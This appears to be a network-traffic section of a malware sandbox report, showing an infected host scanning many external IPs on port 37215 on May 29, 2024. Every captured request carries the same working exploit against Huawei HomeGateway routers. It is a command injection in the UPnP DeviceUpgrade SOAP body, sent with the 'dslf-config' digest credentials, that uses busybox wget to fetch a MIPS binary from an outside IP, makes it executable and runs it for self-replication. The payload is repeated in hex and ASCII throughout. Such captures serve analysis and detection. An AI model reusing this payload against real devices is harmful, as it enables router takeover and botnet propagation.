                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1543192.168.2.1353998157.198.57.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584343910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1544192.168.2.1332948157.194.198.25137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584363937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1545192.168.2.1335816209.1.120.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584383965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1546192.168.2.134975841.37.85.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584439993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1547192.168.2.1348716173.35.57.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584470987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1548192.168.2.135346441.47.198.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584502935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1549192.168.2.134408241.108.28.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584523916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1550192.168.2.1357184197.246.87.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584541082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1551192.168.2.1350750197.8.86.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584562063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1552192.168.2.1357382197.129.209.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584578037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 